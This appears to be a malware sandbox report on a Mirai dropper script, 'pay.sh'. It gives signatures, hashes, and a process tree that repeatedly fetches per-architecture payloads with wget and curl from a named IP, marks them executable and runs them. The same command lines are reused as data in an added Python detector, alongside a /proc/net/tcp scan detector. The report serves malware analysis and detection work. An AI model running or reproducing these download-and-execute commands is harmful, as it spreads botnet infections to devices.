Analysis

  • max time kernel
    51s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    13-12-2024 12:33

General

  • Target

    pay.sh

  • Size

    2KB

  • MD5

    624b68623e669355734d1149ffd5d430

  • SHA1

    ce07fb83638c8fa2865aa2b3d007c35902f7d96a

  • SHA256

    2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc

  • SHA512

    143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23

Malware Config

Extracted

Family

mirai

Botnet

UNST

Extracted

Family

mirai

Botnet

UNST

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large number (65894) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large number of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware such as Mirai modifies the watchdog so that it cannot restart the infected system.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • UPX packed file 3 IoCs

    Detects executables packed with UPX or a modified build of the UPX open-source packer.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 54 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.
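The "Enumerates active TCP sockets" and "Contacts a large number of remote hosts" signatures both come down to the contents of /proc/net/tcp: the sample reads it, and a defender can read the same file to spot the scanner. The following is an added example, not part of this report and not the sandbox's own signature code, that parses that file and counts distinct remote hosts with half-open (SYN_SENT) sockets. The excerpt it parses is constructed, in little-endian (x86) layout; on the mipsbe platform of this run the kernel prints the address word big-endian, which is why the parser takes an endianness flag. The threshold and the sample rows are assumptions.

```python
"""Parse /proc/net/tcp and flag mass half-open connections (added example,
not from the sandbox report). A Mirai scanner leaves many SYN_SENT sockets
to distinct hosts, typically on 23/2323."""
import socket
import sys
from collections import Counter

SYN_SENT = 0x02
ESTABLISHED = 0x01

# Constructed /proc/net/tcp excerpt in x86 (little-endian) layout, not taken
# from the sandbox run. Rows: a listener on 127.0.0.1:22, two SYN_SENT to :23,
# one SYN_SENT to :2323, one ESTABLISHED to 15.228.54.104:80 (the download
# host named in the report).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 14321 1
   1: 0202000A:C350 0A0B0C0D:0017 02 00000001:00000000 01:00000010 00000000     0        0 14400 1
   2: 0202000A:C351 0B0B0C0D:0017 02 00000001:00000000 01:00000010 00000000     0        0 14401 1
   3: 0202000A:C352 0C0B0C0D:0913 02 00000001:00000000 01:00000010 00000000     0        0 14402 1
   4: 0202000A:C353 6836E40F:0050 01 00000000:00000000 00:00000000 00000000     0        0 14403 1
"""


def decode_addr(hex_addr, big_endian):
    """'XXXXXXXX:PPPP' -> (dotted_ip, port). The IPv4 word is printed in host
    byte order: little-endian on x86/mipsel, big-endian on the mipsbe platform
    of this report. The port is a plain host-order integer."""
    ip_hex, port_hex = hex_addr.split(":")
    packed = bytes.fromhex(ip_hex)
    if not big_endian:
        packed = packed[::-1]
    return socket.inet_ntoa(packed), int(port_hex, 16)


def parse_proc_net_tcp(text, big_endian=(sys.byteorder == "big")):
    """Return one dict per socket row with local/remote (ip, port) and state."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 4 or f[0] == "sl":  # skip header and blank lines
            continue
        rows.append({
            "local": decode_addr(f[1], big_endian),
            "remote": decode_addr(f[2], big_endian),
            "state": int(f[3], 16),
        })
    return rows


def scan_indicators(rows, min_hosts=64):
    """Distinct remote hosts with a half-open socket, the most targeted
    ports, and whether the host count crosses the (assumed) threshold."""
    half_open = [r for r in rows if r["state"] == SYN_SENT]
    hosts = {r["remote"][0] for r in half_open}
    ports = Counter(r["remote"][1] for r in half_open).most_common(3)
    return len(hosts), ports, len(hosts) >= min_hosts


if __name__ == "__main__":
    # With a path argument, read the live file using this host's byte order;
    # otherwise run on the constructed little-endian sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_PROC_NET_TCP
    big = (sys.byteorder == "big") if path else False
    n, ports, flagged = scan_indicators(parse_proc_net_tcp(text, big), min_hosts=3)
    print(f"half-open remote hosts={n} top_ports={ports} scan={flagged}")
```

The byte-order caveat matters in practice: the same hex string decodes to 127.0.0.1 on x86 and to 1.0.0.127 on a big-endian MIPS box, so a detector copied from an x86 host will silently report wrong remote addresses on the device class Mirai actually targets.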

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:734
    • /bin/cat
      cat b3astmode.x86
      2⤵
      PID:737
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:738
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:739
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:741
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.mips
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:742
    • /bin/cat
      cat b3astmode.mips
      2⤵
      • System Network Configuration Discovery
      PID:743
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.mips b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:744
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:745
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.mpsl
      2⤵
      • Writes file to tmp directory
      PID:749
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:755
    • /bin/cat
      cat b3astmode.mpsl
      2⤵
      PID:769
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:770
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:772
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm4
      2⤵
      PID:774
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:785
    • /bin/cat
      cat b3astmode.arm4
      2⤵
      PID:794
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:796
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:797
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm5
      2⤵
      • Writes file to tmp directory
      PID:801
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:815
    • /bin/cat
      cat b3astmode.arm5
      2⤵
      PID:816
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:817
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:818
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm6
      2⤵
      • Writes file to tmp directory
      PID:820
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:821
    • /bin/cat
      cat b3astmode.arm6
      2⤵
      PID:826
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:827
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:828
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.arm7
      2⤵
      • Writes file to tmp directory
      PID:832
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:845
    • /bin/cat
      cat b3astmode.arm7
      2⤵
      PID:858
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:859
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:860
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.ppc
      2⤵
      • Writes file to tmp directory
      PID:862
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:863
    • /bin/cat
      cat b3astmode.ppc
      2⤵
      PID:864
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
      2⤵
      • File and Directory Permissions Modification
      PID:865
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:866
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.m68k
      2⤵
      • Writes file to tmp directory
      PID:868
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.m68k
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:872
    • /bin/cat
      cat b3astmode.m68k
      2⤵
      PID:873
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh
      2⤵
      • File and Directory Permissions Modification
      PID:874
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:875
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.sh4
      2⤵
      • Writes file to tmp directory
      PID:877
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:878
    • /bin/cat
      cat b3astmode.sh4
      2⤵
      PID:879
    • /bin/chmod
      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x86 pay.sh
      2⤵
      • File and Directory Permissions Modification
      PID:880
    • /tmp/B3ASTM0DE
      ./B3ASTM0DE
      2⤵
      • Executes dropped EXE
      PID:881
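The tree above is one dropper round per architecture: fetch b3astmode.<arch> with wget and again with curl, `cat` it into B3ASTM0DE, `chmod +x` the contents of /tmp, and run B3ASTM0DE. Two details are inferences rather than something the report states outright: the shell redirect that turns `cat b3astmode.<arch>` into B3ASTM0DE is not part of the argv the sandbox records, which is consistent with B3ASTM0DE reappearing with a new hash in the Downloads list each round; and the systemd-private-... directory in the chmod arguments is the sandbox's own private tmp being picked up by a shell glob such as `*`. The following is an added example, not the author's script and not sandbox tooling, that applies that pattern to a constructed process list built from the command lines above (four of the ten rounds reproduced; PPID 708 follows from the tree depth) and flags the multi-architecture fan-out together with chmod-then-exec of a dropped file under one parent. The architecture-suffix list and the threshold are assumptions.

```python
"""Flag the Mirai-style multi-architecture dropper pattern in a process list.
Added example; not part of the sandbox report."""
import shlex
from collections import defaultdict
from urllib.parse import urlparse

# Assumed, illustrative list of arch suffixes used by Mirai payload families.
ARCH_SUFFIXES = {"x86", "x86_64", "i586", "i686", "mips", "mpsl", "mipsel",
                 "arm", "arm4", "arm5", "arm6", "arm7", "ppc", "m68k", "sh4",
                 "spc", "arc"}
DOWNLOADERS = {"wget", "curl"}

# Constructed (pid, ppid, cmdline) list from the report's process tree; the
# systemd-private-... glob hit is omitted for brevity.
EVENTS = [
    (708, 1,   "/tmp/pay.sh"),
    (712, 708, "wget http://15.228.54.104/beastmode/b3astmode.x86"),
    (734, 708, "curl -O http://15.228.54.104/beastmode/b3astmode.x86"),
    (737, 708, "cat b3astmode.x86"),
    (738, 708, "chmod +x B3ASTM0DE b3astmode.x86 pay.sh"),
    (739, 708, "./B3ASTM0DE"),
    (741, 708, "wget http://15.228.54.104/beastmode/b3astmode.mips"),
    (742, 708, "curl -O http://15.228.54.104/beastmode/b3astmode.mips"),
    (743, 708, "cat b3astmode.mips"),
    (744, 708, "chmod +x B3ASTM0DE b3astmode.mips b3astmode.x86 pay.sh"),
    (745, 708, "./B3ASTM0DE"),
    (749, 708, "wget http://15.228.54.104/beastmode/b3astmode.mpsl"),
    (755, 708, "curl -O http://15.228.54.104/beastmode/b3astmode.mpsl"),
    (769, 708, "cat b3astmode.mpsl"),
    (770, 708, "chmod +x B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh"),
    (772, 708, "./B3ASTM0DE"),
    (832, 708, "wget http://15.228.54.104/beastmode/b3astmode.arm7"),
    (845, 708, "curl -O http://15.228.54.104/beastmode/b3astmode.arm7"),
    (858, 708, "cat b3astmode.arm7"),
    (859, 708, "chmod +x B3ASTM0DE b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh"),
    (860, 708, "./B3ASTM0DE"),
]


def _base(argv0):
    return argv0.rsplit("/", 1)[-1]


def download_urls(events):
    """URLs passed to wget/curl, in order of first appearance."""
    seen = []
    for _pid, _ppid, cmd in events:
        argv = shlex.split(cmd)
        if argv and _base(argv[0]) in DOWNLOADERS:
            for a in argv[1:]:
                if a.startswith(("http://", "https://")) and a not in seen:
                    seen.append(a)
    return seen


def arch_fanout(urls):
    """Group URLs by (host, path without suffix) -> set of arch suffixes."""
    groups = defaultdict(set)
    for u in urls:
        p = urlparse(u)
        stem, _, suffix = p.path.rpartition(".")
        if suffix in ARCH_SUFFIXES:
            groups[(p.netloc, stem)].add(suffix)
    return dict(groups)


def chmod_then_exec(events):
    """(chmod_pid, exec_pid, name) for every file a process makes executable
    that a later sibling under the same parent runs as ./name or /tmp/name."""
    armed = {}  # (ppid, basename) -> pid of the chmod that armed it
    hits = []
    for pid, ppid, cmd in events:
        argv = shlex.split(cmd)
        if not argv:
            continue
        # Heuristic: any mode argument containing 'x' (+x, a+x, u+x ...).
        if _base(argv[0]) == "chmod" and len(argv) > 2 and "x" in argv[1]:
            for f in argv[2:]:
                armed[(ppid, _base(f))] = pid
        elif argv[0].startswith(("./", "/tmp/")):
            key = (ppid, _base(argv[0]))
            if key in armed:
                hits.append((armed[key], pid, key[1]))
    return hits


def assess(events, min_arches=3):
    """Summarise IOCs and give a verdict on the dropper pattern."""
    fanout = arch_fanout(download_urls(events))
    arches = sorted(set().union(*fanout.values())) if fanout else []
    execs = chmod_then_exec(events)
    return {
        "hosts": sorted({host for host, _ in fanout}),
        "arches": arches,
        "exec_pairs": execs,
        "multiarch_dropper": len(arches) >= min_arches and bool(execs),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(assess(EVENTS), indent=2))
```

On real telemetry (auditd execve records, eBPF exec tracing) the same three functions apply unchanged once events are reduced to (pid, ppid, cmdline); the parent-scoped chmod-then-exec check is what separates this loop from a legitimate install script that downloads one binary for the local architecture.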

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/B3ASTM0DE

    Filesize

    23KB

    MD5

    6fdcdf8e1a1d76e45fa874a20a18b804

    SHA1

    8f8253e997ac2997a16e3a189f441d30d9a7675c

    SHA256

    f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057

    SHA512

    d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc

  • /tmp/B3ASTM0DE

    Filesize

    24KB

    MD5

    8e2bc890571386d49be504c19d6ae5f4

    SHA1

    ec10343c39481e9867cab49607feb8351baa17dd

    SHA256

    e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2

    SHA512

    75b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af

  • /tmp/B3ASTM0DE

    Filesize

    275B

    MD5

    8a052866f3090135b18f374ce1049566

    SHA1

    cc858d4367e62558a09416f9521c159ec02ce42f

    SHA256

    efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120

    SHA512

    0b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16

  • /tmp/B3ASTM0DE

    Filesize

    49KB

    MD5

    d585800f95f4f716d9faf633ebaa9433

    SHA1

    ddf0a2bf2db94565ff0195178c35464c461bba26

    SHA256

    ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558

    SHA512

    af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122

  • /tmp/B3ASTM0DE

    Filesize

    50KB

    MD5

    1eb79986e143c1056ba849622066314a

    SHA1

    8e3f6732545066ea8437a0fea031ac48d3fb91ac

    SHA256

    584deb400df62226321615bf2e15538cd3483d0effea114df211395f7d4e3e49

    SHA512

    57c1ee3f81f78d767163d1834d061e36bdf3f8fbd359c73522e5e51c8887a92b2a12c65636cdc49e2974246e24bd944030d6d91083776f62e53018dacf850d3e

  • /tmp/b3astmode.x86

    Filesize

    22KB

    MD5

    873c6ba01596fdbb9c469fe1e0180243

    SHA1

    9236be2f17ba4d7422bf8f579d95c6226d3eaa48

    SHA256

    9959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170

    SHA512

    f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee